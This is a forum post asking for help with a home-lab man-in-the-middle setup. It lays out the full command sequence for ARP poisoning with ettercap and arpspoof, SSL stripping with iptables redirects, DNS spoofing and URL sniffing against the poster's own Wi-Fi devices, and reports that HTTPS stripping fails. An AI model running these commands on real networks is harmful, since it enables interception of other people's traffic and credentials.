Thread: Ettercap combined with SSLStrip + urlsnarf not behaving correctly

Ettercap combined with SSLStrip + urlsnarf not behaving correctly

I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-Bit Kali), by means of ARP-poisoning the communication between my router and my targetted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof.

I am using a combination of the following:
    - SSLStrip
    - Ettercap (with the dns_spoof plugin enabled).
    - urlsnarf
    - Wireshark (for examining post-test PCAP results)

The commands I perform are as follows:

Code:
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    sslstrip -p -k -w /root/sslstrip.log
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    urlsnarf -i wlan0 | grep http > /root/session.txt

# 192.168.2.1 = router, 192.168.2.130 = Macbook Air

echo 1 > /proc/sys/net/ipv4/ip_forward; ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/
    ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/

# This runs for a while,I then stop manually... and then clean up and examine results in Wireshark

wireshark &
    killall sslstrip
    killall python
    killall urlsnarf
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/session.eci
    I am able to intercept and decode http packets just fine. Unfortunately, I've had little success in capturing redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/. Instead, what happens is I will receive an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari), a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; just resolves the domain as it should. (see my /etc/ettercap/etter.dns configuration below).

I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534)

Code:
    . . . 

[privs]
    ec_uid = 0                # nobody is the default
    ec_gid = 0                # nobody is the default

. . . 

# if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

. . .
    Alternatively, for a simple dnsspoof, I've tried a simple combination of arpsoof + dnsspoof. Doesn't work either.

echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1
    dnsspoof -i wlan0 -f /root/hosts.txt

I've Googled for a few days now, but after reading post-upon-post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below...

Any help would be greatly appreciated.

Thanks,
    Attached Files Attached Files